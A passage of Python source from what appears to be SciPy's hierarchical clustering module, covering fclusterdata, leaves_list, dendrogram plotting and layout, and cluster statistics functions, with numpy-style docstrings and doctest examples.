X : (N, M) ndarray
N by M data matrix with N observations in M dimensions.
t : float
The threshold to apply when forming flat clusters.
criterion : str, optional
Specifies the criterion for forming flat clusters. Valid
values are 'inconsistent' (default), 'distance', or 'maxclust'
cluster formation algorithms. See `fcluster` for descriptions.
metric : str, optional
The distance metric for calculating pairwise distances. See
`distance.pdist` for descriptions and linkage to verify
compatibility with the linkage method.
depth : int, optional
The maximum depth for the inconsistency calculation. See
`inconsistent` for more information.
method : str, optional
The linkage method to use (single, complete, average,
weighted, median, centroid, ward). See `linkage` for more
information. Default is "single".
R : ndarray, optional
The inconsistency matrix. It will be computed if necessary
if it is not passed.
Returns
-------
fclusterdata : ndarray
A vector of length n. T[i] is the flat cluster number to
which original observation i belongs.
Notes
-----
This function is similar to the MATLAB function clusterdata.
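Examples
--------
A minimal sketch (assuming this module is importable as
``scipy.cluster.hierarchy``; the data are made up):
>>> from scipy.cluster.hierarchy import fclusterdata
>>> X = [[0.0, 0.0], [0.3, 0.1], [5.0, 5.0], [5.2, 4.9]]
>>> T = fclusterdata(X, t=1.0, criterion='distance')
>>> len(T) == len(X)    # one flat cluster id per observation
True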
"""
X = np.asarray(X, order='c', dtype=np.double)
if type(X) != np.ndarray or len(X.shape) != 2:
raise TypeError('The observation matrix X must be an n by m numpy '
'array.')
Y = distance.pdist(X, metric=metric)
Z = linkage(Y, method=method)
if R is None:
R = inconsistent(Z, d=depth)
else:
R = np.asarray(R, order='c')
T = fcluster(Z, criterion=criterion, depth=depth, R=R, t=t)
return T
def leaves_list(Z):
"""
Returns a list of leaf node ids
The return corresponds to the observation vector index as it appears
in the tree from left to right. Z is a linkage matrix.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. `Z` is
a linkage matrix. See ``linkage`` for more information.
Returns
-------
leaves_list : ndarray
The list of leaf node ids.
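Examples
--------
A minimal sketch with a hypothetical two-row linkage:
>>> import numpy as np
>>> Z = np.array([[0., 1., 0.3, 2.],
...               [2., 3., 0.7, 3.]])
>>> order = leaves_list(Z)
>>> sorted(int(i) for i in order)   # each original observation appears once
[0, 1, 2]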
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
ML = np.zeros((n,), dtype='i')
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.prelist(Z, ML, int(n))
return ML
# Maps number of leaves to text size.
#
# p <= 20, size="12"
# 20 < p <= 30, size="10"
# 30 < p <= 50, size="8"
# 50 < p <= np.inf, size="6"
_dtextsizes = {20: 12, 30: 10, 50: 8, 85: 6, np.inf: 5}
_drotation = {20: 0, 40: 45, np.inf: 90}
_dtextsortedkeys = list(_dtextsizes.keys())
_dtextsortedkeys.sort()
_drotationsortedkeys = list(_drotation.keys())
_drotationsortedkeys.sort()
def _remove_dups(L):
"""
Removes duplicates AND preserves the original order of the elements.
The set class is not guaranteed to do this.
"""
seen_before = set([])
L2 = []
for i in L:
if i not in seen_before:
seen_before.add(i)
L2.append(i)
return L2
def _get_tick_text_size(p):
for k in _dtextsortedkeys:
if p <= k:
return _dtextsizes[k]
def _get_tick_rotation(p):
for k in _drotationsortedkeys:
if p <= k:
return _drotation[k]
def _plot_dendrogram(icoords, dcoords, ivl, p, n, mh, orientation,
no_labels, color_list, leaf_font_size=None,
leaf_rotation=None, contraction_marks=None,
ax=None, above_threshold_color='b'):
# Import matplotlib here so that it's not imported unless dendrograms
# are plotted. Raise an informative error if importing fails.
try:
# if an axis is provided, don't use pylab at all
if ax is None:
import matplotlib.pylab
import matplotlib.patches
import matplotlib.collections
except ImportError:
raise ImportError("You must install the matplotlib library to plot the dendrogram. Use no_plot=True to calculate the dendrogram without plotting.")
if ax is None:
ax = matplotlib.pylab.gca()
# if we're using pylab, we want to trigger a draw at the end
trigger_redraw = True
else:
trigger_redraw = False
# Independent variable plot width
ivw = len(ivl) * 10
# Dependent variable plot height
dvw = mh + mh * 0.05
ivticks = np.arange(5, len(ivl) * 10 + 5, 10)
if orientation == 'top':
ax.set_ylim([0, dvw])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
ax.xaxis.set_ticks_position('bottom')
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(len(ivl)))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(len(ivl)))
for lbl in lbls:
lbl.set_size(leaf_fs)
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'bottom':
ax.set_ylim([dvw, 0])
ax.set_xlim([0, ivw])
xlines = icoords
ylines = dcoords
if no_labels:
ax.set_xticks([])
ax.set_xticklabels([])
else:
ax.set_xticks(ivticks)
ax.set_xticklabels(ivl)
lbls = ax.get_xticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
else:
leaf_rot = float(_get_tick_rotation(p))
for lbl in lbls:
lbl.set_rotation(leaf_rot)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
else:
leaf_fs = float(_get_tick_text_size(p))
for lbl in lbls:
lbl.set_size(leaf_fs)
ax.xaxis.set_ticks_position('top')
# Make the tick marks invisible because they cover up the links
for line in ax.get_xticklines():
line.set_visible(False)
elif orientation == 'left':
ax.set_xlim([0, dvw])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('left')
# Make the tick marks invisible because they cover up the
# links
for line in ax.get_yticklines():
line.set_visible(False)
elif orientation == 'right':
ax.set_xlim([dvw, 0])
ax.set_ylim([0, ivw])
xlines = dcoords
ylines = icoords
if no_labels:
ax.set_yticks([])
ax.set_yticklabels([])
else:
ax.set_yticks(ivticks)
ax.set_yticklabels(ivl)
lbls = ax.get_yticklabels()
if leaf_rotation:
for lbl in lbls:
lbl.set_rotation(leaf_rotation)
if leaf_font_size:
for lbl in lbls:
lbl.set_size(leaf_font_size)
ax.yaxis.set_ticks_position('right')
# Make the tick marks invisible because they cover up the links
for line in ax.get_yticklines():
line.set_visible(False)
# Let's use collections instead. This way there is a separate legend
# item for each tree grouping, rather than stupidly one for each line
# segment.
colors_used = _remove_dups(color_list)
color_to_lines = {}
for color in colors_used:
color_to_lines[color] = []
for (xline, yline, color) in zip(xlines, ylines, color_list):
color_to_lines[color].append(list(zip(xline, yline)))
colors_to_collections = {}
# Construct the collections.
for color in colors_used:
coll = matplotlib.collections.LineCollection(color_to_lines[color],
colors=(color,))
colors_to_collections[color] = coll
# Add all the groupings below the color threshold.
for color in colors_used:
if color != above_threshold_color:
ax.add_collection(colors_to_collections[color])
# If there is a grouping of links above the color threshold,
# it should go last.
if above_threshold_color in colors_to_collections:
ax.add_collection(colors_to_collections[above_threshold_color])
if contraction_marks is not None:
if orientation in ('left', 'right'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((y, x),
width=dvw / 100, height=1.0)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if orientation in ('top', 'bottom'):
for (x, y) in contraction_marks:
e = matplotlib.patches.Ellipse((x, y),
width=1.0, height=dvw / 100)
ax.add_artist(e)
e.set_clip_box(ax.bbox)
e.set_alpha(0.5)
e.set_facecolor('k')
if trigger_redraw:
matplotlib.pylab.draw_if_interactive()
_link_line_colors = ['g', 'r', 'c', 'm', 'y', 'k']
def set_link_color_palette(palette):
"""
Set list of matplotlib color codes for dendrogram color_threshold.
Parameters
----------
palette : list
A list of matplotlib color codes. The order of
the color codes is the order in which the colors are cycled
through when color thresholding in the dendrogram.
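Examples
--------
A minimal sketch; the single-letter codes below are ordinary matplotlib
color strings chosen only for illustration:
>>> set_link_color_palette(['c', 'm', 'y', 'k'])
>>> # Later dendrogram() calls now cycle through cyan, magenta, yellow
>>> # and black for links below ``color_threshold``.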
"""
if type(palette) not in (list, tuple):
raise TypeError("palette must be a list or tuple")
_ptypes = [isinstance(p, string_types) for p in palette]
if False in _ptypes:
raise TypeError("all palette list elements must be color strings")
for i in list(_link_line_colors):
_link_line_colors.remove(i)
_link_line_colors.extend(list(palette))
def dendrogram(Z, p=30, truncate_mode=None, color_threshold=None,
get_leaves=True, orientation='top', labels=None,
count_sort=False, distance_sort=False, show_leaf_counts=True,
no_plot=False, no_labels=False, color_list=None,
leaf_font_size=None, leaf_rotation=None, leaf_label_func=None,
no_leaves=False, show_contracted=False,
link_color_func=None, ax=None, above_threshold_color='b'):
"""
Plots the hierarchical clustering as a dendrogram.
The dendrogram illustrates how each cluster is
composed by drawing a U-shaped link between a non-singleton
cluster and its children. The height of the top of the U-link is
the distance between its children clusters. It is also the
cophenetic distance between original observations in the two
children clusters. It is expected that the distances in Z[:,2] be
monotonic, otherwise crossings appear in the dendrogram.
Parameters
----------
Z : ndarray
The linkage matrix encoding the hierarchical clustering to
render as a dendrogram. See the ``linkage`` function for more
information on the format of ``Z``.
p : int, optional
The ``p`` parameter for ``truncate_mode``.
truncate_mode : str, optional
The dendrogram can be hard to read when the original
observation matrix from which the linkage is derived is
large. Truncation is used to condense the dendrogram. There
are several modes:
``None/'none'``
No truncation is performed (Default).
``'lastp'``
The last ``p`` non-singleton clusters formed in the linkage are the only
non-leaf nodes in the linkage; they correspond to rows
``Z[n-p-2:end]`` in ``Z``. All other non-singleton clusters are
contracted into leaf nodes.
``'mlab'``
This corresponds to MATLAB(TM) behavior. (not implemented yet)
``'level'/'mtica'``
No more than ``p`` levels of the dendrogram tree are displayed.
This corresponds to Mathematica(TM) behavior.
color_threshold : double, optional
For brevity, let :math:`t` be the ``color_threshold``.
Colors all the descendent links below a cluster node
:math:`k` the same color if :math:`k` is the first node below
the cut threshold :math:`t`. All links connecting nodes with
distances greater than or equal to the threshold are colored
blue. If :math:`t` is less than or equal to zero, all nodes
are colored blue. If ``color_threshold`` is None or
'default', corresponding with MATLAB(TM) behavior, the
threshold is set to ``0.7*max(Z[:,2])``.
get_leaves : bool, optional
Includes a list ``R['leaves']=H`` in the result
dictionary. For each :math:`i`, ``H[i] == j``, cluster node
``j`` appears in position ``i`` in the left-to-right traversal
of the leaves, where :math:`j < 2n-1` and :math:`i < n`.
orientation : str, optional
The direction to plot the dendrogram, which can be any
of the following strings:
``'top'``
Plots the root at the top, and plot descendent links going downwards.
(default).
``'bottom'``
Plots the root at the bottom, and plot descendent links going
upwards.
``'left'``
Plots the root at the left, and plot descendent links going right.
``'right'``
Plots the root at the right, and plot descendent links going left.
labels : ndarray, optional
By default ``labels`` is None so the index of the original observation
is used to label the leaf nodes. Otherwise, this is an :math:`n`
-sized list (or tuple). The ``labels[i]`` value is the text to put
under the :math:`i` th leaf node only if it corresponds to an original
observation and not a non-singleton cluster.
count_sort : str or bool, optional
For each node n, the order (visually, from left-to-right) in which n's
two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum number of original objects in its cluster
is plotted first.
``'descending'``
The child with the maximum number of original objects in its cluster
is plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
distance_sort : str or bool, optional
For each node n, the order (visually, from left-to-right) in which n's
two descendent links are plotted is determined by this
parameter, which can be any of the following values:
``False``
Nothing is done.
``'ascending'`` or ``True``
The child with the minimum distance between its direct descendents is
plotted first.
``'descending'``
The child with the maximum distance between its direct descendents is
plotted first.
Note ``distance_sort`` and ``count_sort`` cannot both be True.
show_leaf_counts : bool, optional
When True, leaf nodes representing :math:`k>1` original
observations are labeled with the number of observations they
contain in parentheses.
no_plot : bool, optional
When True, the final rendering is not performed. This is
useful if only the data structures computed for the rendering
are needed or if matplotlib is not available.
no_labels : bool, optional
When True, no labels appear next to the leaf nodes in the
rendering of the dendrogram.
leaf_rotation : double, optional
Specifies the angle (in degrees) to rotate the leaf
labels. When unspecified, the rotation is based on the number of
nodes in the dendrogram (default is 0).
leaf_font_size : int, optional
Specifies the font size (in points) of the leaf labels. When
unspecified, the size is based on the number of nodes in the
dendrogram.
leaf_label_func : lambda or function, optional
When leaf_label_func is a callable function, it is called for each
leaf with cluster index :math:`k < 2n-1` and is expected to return
a string with the label for that leaf.
Indices :math:`k < n` correspond to original observations
while indices :math:`k \\geq n` correspond to non-singleton
clusters.
For example, to label singletons with their node id and
non-singletons with their id, count, and inconsistency
coefficient, simply do::
# First define the leaf label function.
def llf(id):
if id < n:
return str(id)
else:
return '[%d %d %1.2f]' % (id, count, R[n-id,3])
# The text for the leaf nodes is going to be big so force
# a rotation of 90 degrees.
dendrogram(Z, leaf_label_func=llf, leaf_rotation=90)
show_contracted : bool, optional
When True the heights of non-singleton nodes contracted
into a leaf node are plotted as crosses along the link
connecting that leaf node. This really is only useful when
truncation is used (see ``truncate_mode`` parameter).
link_color_func : callable, optional
If given, `link_color_func` is called with each non-singleton id
corresponding to each U-shaped link it will paint. The function is
expected to return the color to paint the link, encoded as a matplotlib
color string code. For example::
dendrogram(Z, link_color_func=lambda k: colors[k])
colors the direct links below each untruncated non-singleton node
``k`` using ``colors[k]``.
ax : matplotlib Axes instance, optional
If None and `no_plot` is not True, the dendrogram will be plotted
on the current axes. Otherwise if `no_plot` is not True the
dendrogram will be plotted on the given ``Axes`` instance. This can be
useful if the dendrogram is part of a more complex figure.
above_threshold_color : str, optional
This matplotlib color string sets the color of the links above the
color_threshold. The default is 'b'.
Returns
-------
R : dict
A dictionary of data structures computed to render the
dendrogram. It has the following keys:
``'color_list'``
A list of color names. The k'th element represents the color of the
k'th link.
``'icoord'`` and ``'dcoord'``
Each of them is a list of lists. Let ``icoord = [I1, I2, ..., Ip]``
where ``Ik = [xk1, xk2, xk3, xk4]`` and ``dcoord = [D1, D2, ..., Dp]``
where ``Dk = [yk1, yk2, yk3, yk4]``, then the k'th link painted is
``(xk1, yk1)`` - ``(xk2, yk2)`` - ``(xk3, yk3)`` - ``(xk4, yk4)``.
``'ivl'``
A list of labels corresponding to the leaf nodes.
``'leaves'``
For each i, ``H[i] == j``, cluster node ``j`` appears in position
``i`` in the left-to-right traversal of the leaves, where
:math:`j < 2n-1` and :math:`i < n`. If ``j`` is less than ``n``, the
``i``-th leaf node corresponds to an original observation.
Otherwise, it corresponds to a non-singleton cluster.
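Examples
--------
A minimal sketch (assuming this module is importable as
``scipy.cluster.hierarchy``); ``no_plot=True`` keeps the example free of
any matplotlib dependency:
>>> from scipy.cluster.hierarchy import linkage, dendrogram
>>> X = [[0.0], [0.4], [5.0], [5.3]]
>>> Z = linkage(X, method='single')
>>> info = dendrogram(Z, no_plot=True)
>>> sorted(info.keys())
['color_list', 'dcoord', 'icoord', 'ivl', 'leaves']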
"""
# Features under consideration.
#
# ... = dendrogram(..., leaves_order=None)
#
# Plots the leaves in the order specified by a vector of
# original observation indices. If the vector contains duplicates
# or results in a crossing, an exception will be thrown. Passing
# None orders leaf nodes based on the order they appear in the
# pre-order traversal.
Z = np.asarray(Z, order='c')
if orientation not in ["top", "left", "bottom", "right"]:
raise ValueError("orientation must be one of 'top', 'left', "
"'bottom', or 'right'")
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
if type(p) in (int, float):
p = int(p)
else:
raise TypeError('The second argument must be a number')
if truncate_mode not in ('lastp', 'mlab', 'mtica', 'level', 'none', None):
raise ValueError('Invalid truncation mode.')
if truncate_mode == 'lastp' or truncate_mode == 'mlab':
if p > n or p == 0:
p = n
if truncate_mode == 'mtica' or truncate_mode == 'level':
if p <= 0:
p = np.inf
if get_leaves:
lvs = []
else:
lvs = None
icoord_list = []
dcoord_list = []
color_list = []
current_color = [0]
currently_below_threshold = [False]
if no_leaves:
ivl = None
else:
ivl = []
if color_threshold is None or \
(isinstance(color_threshold, string_types) and
color_threshold == 'default'):
color_threshold = max(Z[:, 2]) * 0.7
R = {'icoord': icoord_list, 'dcoord': dcoord_list, 'ivl': ivl,
'leaves': lvs, 'color_list': color_list}
if show_contracted:
contraction_marks = []
else:
contraction_marks = None
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=2 * n - 2, iv=0.0, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
if not no_plot:
mh = max(Z[:, 2])
_plot_dendrogram(icoord_list, dcoord_list, ivl, p, n, mh, orientation,
no_labels, color_list,
leaf_font_size=leaf_font_size,
leaf_rotation=leaf_rotation,
contraction_marks=contraction_marks,
ax=ax,
above_threshold_color=above_threshold_color)
return R
def _append_singleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
# If leaf node labels are to be displayed...
if ivl is not None:
# If a leaf_label_func has been provided, the label comes from the
# string returned from the leaf_label_func, which is a function
# passed to dendrogram.
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
# Otherwise, if the dendrogram caller has passed a labels list
# for the leaf nodes, use it.
if labels is not None:
ivl.append(labels[int(i - n)])
else:
# Otherwise, use the id as the label for the leaf.
ivl.append(str(int(i)))
def _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels, show_leaf_counts):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
if ivl is not None:
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
if show_leaf_counts:
ivl.append("(" + str(int(Z[i - n, 3])) + ")")
else:
ivl.append("")
def _append_contraction_marks(Z, iv, i, n, contraction_marks):
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _append_contraction_marks_sub(Z, iv, i, n, contraction_marks):
if i >= n:
contraction_marks.append((iv, Z[i - n, 2]))
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _dendrogram_calculate_info(Z, p, truncate_mode,
color_threshold=np.inf, get_leaves=True,
orientation='top', labels=None,
count_sort=False, distance_sort=False,
show_leaf_counts=False, i=-1, iv=0.0,
ivl=[], n=0, icoord_list=[], dcoord_list=[],
lvs=None, mhr=False,
current_color=[], color_list=[],
currently_below_threshold=[],
leaf_label_func=None, level=0,
contraction_marks=None,
link_color_func=None,
above_threshold_color='b'):
"""
Calculates the endpoints of the links as well as the labels for the
dendrogram rooted at the node with index i. iv is the independent
variable value to plot the left-most leaf node below the root node i
(if orientation='top', this would be the left-most x value where the
plotting of this root node i and its descendents should begin).
ivl is a list to store the labels of the leaf nodes. The leaf_label_func
is called whenever ivl != None, labels == None, and
leaf_label_func != None. When ivl != None and labels != None, the
labels list is used only for labeling the leaf nodes. When
ivl == None, no labels are generated for leaf nodes.
When get_leaves==True, a list of leaves is built as they are visited
in the dendrogram.
Returns a tuple with l being the independent variable coordinate that
corresponds to the midpoint of cluster to the left of cluster i if
i is non-singleton, otherwise the independent coordinate of the leaf
node if i is a leaf node.
Returns
-------
A tuple (left, w, h, md), where:
* left is the independent variable coordinate of the center of the
U of the subtree
* w is the amount of space used for the subtree (in independent
variable units)
* h is the height of the subtree in dependent variable units
* md is the max(Z[*,2]) for all nodes * below and including
the target node.
"""
if n == 0:
raise ValueError("Invalid singleton cluster count n.")
if i == -1:
raise ValueError("Invalid root cluster index i.")
if truncate_mode == 'lastp':
# If the node is a leaf node but corresponds to a non-singleton cluster,
# its label is either the empty string or the number of original
# observations belonging to cluster i.
if i < 2 * n - p and i >= n:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mtica', 'level'):
if i > n and level > p:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mlab',):
pass
# Otherwise, only truncate if we have a leaf node.
#
# If the truncate_mode is mlab, the linkage has been modified
# with the truncated tree.
#
# Only place leaves if they correspond to original observations.
if i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
# !!! Otherwise, we don't have a leaf node, so work on plotting a
# non-leaf node.
# Actual indices of a and b
aa = int(Z[i - n, 0])
ab = int(Z[i - n, 1])
if aa > n:
# The number of singletons below cluster a
na = Z[aa - n, 3]
# The distance between a's two direct children.
da = Z[aa - n, 2]
else:
na = 1
da = 0.0
if ab > n:
nb = Z[ab - n, 3]
db = Z[ab - n, 2]
else:
nb = 1
db = 0.0
if count_sort == 'ascending' or count_sort == True:
# If a has a count greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if na > nb:
# The cluster index to draw to the left (ua) will be ab
# and the one to draw to the right (ub) will be aa
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif count_sort == 'descending':
# If a has a count less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if na > nb:
ua = aa
ub = ab
else:
ua = ab
ub = aa
elif distance_sort == 'ascending' or distance_sort == True:
# If a has a distance greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if da > db:
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif distance_sort == 'descending':
# If a has a distance less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if da > db:
ua = aa
ub = ab
else:
ua = ab
ub = aa
else:
ua = aa
ub = ab
# Updated iv variable and the amount of space used.
(uiva, uwa, uah, uamd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ua, iv=iv, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
h = Z[i - n, 2]
if h >= color_threshold or color_threshold <= 0:
c = above_threshold_color
if currently_below_threshold[0]:
current_color[0] = (current_color[0] + 1) % len(_link_line_colors)
currently_below_threshold[0] = False
else:
currently_below_threshold[0] = True
c = _link_line_colors[current_color[0]]
(uivb, uwb, ubh, ubmd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ub, iv=iv + uwa, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
max_dist = max(uamd, ubmd, h)
icoord_list.append([uiva, uiva, uivb, uivb])
dcoord_list.append([uah, h, h, ubh])
if link_color_func is not None:
v = link_color_func(int(i))
if not isinstance(v, string_types):
raise TypeError("link_color_func must return a matplotlib "
"color string!")
color_list.append(v)
else:
color_list.append(c)
return (((uiva + uivb) / 2), uwa + uwb, h, max_dist)
def is_isomorphic(T1, T2):
"""
Determines if two different cluster assignments are equivalent.
Parameters
----------
T1 : array_like
An assignment of singleton cluster ids to flat cluster ids.
T2 : array_like
An assignment of singleton cluster ids to flat cluster ids.
Returns
-------
b : bool
Whether the flat cluster assignments `T1` and `T2` are
equivalent.
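Examples
--------
A minimal sketch: the first pair of assignments uses different label
values but induces the same partition, the second pair does not:
>>> is_isomorphic([1, 1, 2, 2], [5, 5, 7, 7])
True
>>> is_isomorphic([1, 1, 2, 2], [5, 7, 7, 7])
False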
"""
T1 = np.asarray(T1, order='c')
T2 = np.asarray(T2, order='c')
if type(T1) != np.ndarray:
raise TypeError('T1 must be a numpy array.')
if type(T2) != np.ndarray:
raise TypeError('T2 must be a numpy array.')
T1S = T1.shape
T2S = T2.shape
if len(T1S) != 1:
raise ValueError('T1 must be one-dimensional.')
if len(T2S) != 1:
raise ValueError('T2 must be one-dimensional.')
if T1S[0] != T2S[0]:
raise ValueError('T1 and T2 must have the same number of elements.')
n = T1S[0]
d = {}
for i in xrange(0, n):
if T1[i] in d:
if d[T1[i]] != T2[i]:
return False
else:
d[T1[i]] = T2[i]
return True
def maxdists(Z):
"""
Returns the maximum distance between any non-singleton cluster.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
Returns
-------
maxdists : ndarray
A ``(n-1)`` sized numpy array of doubles; ``MD[i]`` represents
the maximum distance between any cluster (including
singletons) below and including the node with index i. More
specifically, ``MD[i] = Z[Q(i)-n, 2].max()`` where ``Q(i)`` is the
set of all node indices below and including node i.
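Examples
--------
A minimal sketch with a hypothetical two-row linkage:
>>> import numpy as np
>>> Z = np.array([[0., 1., 0.3, 2.],
...               [2., 3., 0.7, 3.]])
>>> md = maxdists(Z)
>>> # md[0] is 0.3 (only the first merge lies below node 3) and md[1]
>>> # is 0.7 (the largest distance below and including the root).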
"""
Z = np.asarray(Z, order='c', dtype=np.double)
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
MD = np.zeros((n - 1,))
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.get_max_dist_for_each_cluster(Z, MD, int(n))
return MD
def maxinconsts(Z, R):
"""
Returns the maximum inconsistency coefficient for each
non-singleton cluster and its descendents.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : ndarray
The inconsistency matrix.
Returns
-------
MI : ndarray
A monotonic ``(n-1)``-sized numpy array of doubles.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
n = Z.shape[0] + 1
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
MI = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MI, int(n), 3)
return MI
def maxRstat(Z, R, i):
"""
Returns the maximum statistic for each non-singleton cluster and
its descendents.
Parameters
----------
Z : array_like
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : array_like
The inconsistency matrix.
i : int
The column of `R` to use as the statistic.
Returns
-------
MR : ndarray
Calculates the maximum statistic for the i'th column of the
inconsistency matrix `R` for each non-singleton cluster
node. ``MR[j]`` is the maximum over ``R[Q(j)-n, i]`` where
``Q(j)`` the set of all node ids corresponding to nodes below
and including ``j``.
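Examples
--------
A minimal sketch (assuming this module is importable as
``scipy.cluster.hierarchy``), using column 3 of the inconsistency
matrix as in the ``fcluster`` docstring:
>>> from scipy.cluster.hierarchy import linkage, inconsistent, maxRstat
>>> X = [[0.0], [0.4], [5.0], [5.3]]
>>> Z = linkage(X, method='single')
>>> R = inconsistent(Z)
>>> MR = maxRstat(Z, R, 3)
>>> MR.shape    # one entry per non-singleton cluster
(3,)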
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
if type(i) is not int:
raise TypeError('The third argument must be an integer.')
if i < 0 or i > 3:
raise ValueError('i must be an integer between 0 and 3 inclusive.')
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
n = Z.shape[0] + 1
MR = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MR, int(n), i)
return MR
def leaders(Z, T):
"""
Returns the root nodes in a hierarchical clustering.
Returns the root nodes in a hierarchical clustering corresponding
to a cut defined by a flat cluster assignment vector ``T``. See
